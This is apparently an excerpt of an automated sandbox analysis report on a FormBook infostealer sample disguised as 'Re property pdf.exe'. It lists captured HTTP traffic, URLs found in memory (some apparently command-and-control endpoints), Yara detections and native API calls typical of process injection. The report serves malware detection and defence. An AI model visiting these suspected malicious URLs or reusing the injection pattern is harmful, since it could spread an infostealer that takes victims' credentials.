padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 19 Oct 2024 10:59:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 19 Oct 2024 10:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 19 Oct 2024 10:59:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: Re property pdf.exe, 00000000.00000002.1790854732.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, hwOHPmqcegxcxb.exe, 00000007.00000002.2009081564.0000000002D97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4215060092.00000000059B9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jsninja.net
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4215060092.00000000059B9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jsninja.net/a57a/
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Re property pdf.exe, 00000000.00000002.1794226232.0000000005664000.00000004.00000020.00020000.00000000.sdmp, Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4213103511.0000000003D8A000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.0000000005A8A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4213103511.0000000004240000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.0000000005F40000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4213103511.00000000043D2000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.00000000060D2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.mothersalwaysright.com/9ect/?2BWDG=U/rZoA1baL0SL

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_07724C88 NtUnmapViewOfSection,0_2_07724C88
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_07724C80 NtUnmapViewOfSection,0_2_07724C80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0042C233 NtClose,6_2_0042C233
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042B60 NtClose,LdrInitializeThunk,6_2_01042B60
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01042DF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01042C70
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010435C0 NtCreateMutant,LdrInitializeThunk,6_2_010435C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01044340 NtSetContextThread,6_2_01044340
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01044650 NtSuspendThread,6_2_01044650
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042B80 NtQueryInformationFile,6_2_01042B80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042BA0 NtEnumerateValueKey,6_2_01042BA0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042BE0 NtQueryValueKey,6_2_01042BE0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042BF0 NtAllocateVirtualMemory,6_2_01042BF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042AB0 NtWaitForSingleObject,6_2_01042AB0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042AD0 NtReadFile,6_2_01042AD0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042AF0 NtWriteFile,6_2_01042AF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042D00 NtSetInformationFile,6_2_01042D00
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042D10 NtMapViewOfSection,6_2_01042D10
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042D30 NtUnmapViewOfSection,6_2_01042D30
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042DB0 NtEnumerateKey,6_2_01042DB0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042DD0 NtDelayExecution,6_2_01042DD0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042C00 NtQueryInformationProcess,6_2_01042C00
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042C60 NtCreateKey,6_2_01042C60
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042CA0 NtQueryInformationToken,6_2_01042CA0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042CC0 NtQueryVirtualMemory,6_2_01042CC0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042CF0 NtOpenProcess,6_2_01042CF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042F30 NtCreateSection,6_2_01042F30
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042F60 NtCreateProcessEx,6_2_01042F60
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042F90 NtProtectVirtualMemory,6_2_01042F90
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042FA0 NtQuerySection,6_2_01042FA0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042FB0 NtResumeThread,6_2_01042FB0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042FE0 NtCreateFile,6_2_01042FE0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042E30 NtWriteVirtualMemory,6_2_01042E30
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042E80 NtReadVirtualMemory,6_2_01042E80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042EA0 NtAdjustPrivilegesToken,6_2_01042EA0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042EE0 NtQueueApcThread,6_2_01042EE0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01043010 NtOpenDirectoryObject,6_2_01043010
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01043090 NtSetValueKey,6_2_01043090
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010439B0 NtGetContextThread,6_2_010439B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01043D10 NtOpenProcessToken,6_2_01043D10
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01043D70 NtOpenThread,6_2_01043D70
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_075007B00_2_075007B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_074F4D3B0_2_074F4D3B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_0130D5BC0_2_0130D5BC
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_0130B8880_2_0130B888
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_052F00060_2_052F0006
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_052F00400_2_052F0040
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_052FA0570_2_052FA057
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_052FDB980_2_052FDB98
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_0772A7500_2_0772A750
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_077224000_2_07722400
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_077223F10_2_077223F1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_077240E00_2_077240E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_07721FC80_2_07721FC8
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_07721FBB0_2_07721FBB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_07721B900_2_07721B90
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_07721B810_2_07721B81
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_077228380_2_07722838
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 0_2_077228280_2_07722828
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_004182F36_2_004182F3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0042E8036_2_0042E803
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0040FB7A6_2_0040FB7A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0040FB836_2_0040FB83
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0040240A6_2_0040240A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_004024106_2_00402410
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_004164D36_2_004164D3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0040DDC86_2_0040DDC8
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0040FDA36_2_0040FDA3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0040DE236_2_0040DE23
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00402F706_2_00402F70
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010001006_2_01000100
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AA1186_2_010AA118
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010981586_2_01098158
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D01AA6_2_010D01AA
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C41A26_2_010C41A2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C81CC6_2_010C81CC
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A20006_2_010A2000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CA3526_2_010CA352
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D03E66_2_010D03E6
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E3F06_2_0101E3F0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B02746_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010902C06_2_010902C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010105356_2_01010535
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D05916_2_010D0591
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B44206_2_010B4420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C24466_2_010C2446
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BE4F66_2_010BE4F6
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010347506_2_01034750
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010107706_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100C7C06_2_0100C7C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102C6E06_2_0102C6E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF68B86_2_00FF68B8
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010269626_2_01026962
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A06_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010DA9A66_2_010DA9A6
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101A8406_2_0101A840
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010128406_2_01012840
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E8F06_2_0103E8F0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CAB406_2_010CAB40
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C6BD76_2_010C6BD7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA806_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101AD006_2_0101AD00
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010ACD1F6_2_010ACD1F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01028DBF6_2_01028DBF
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100ADE06_2_0100ADE0
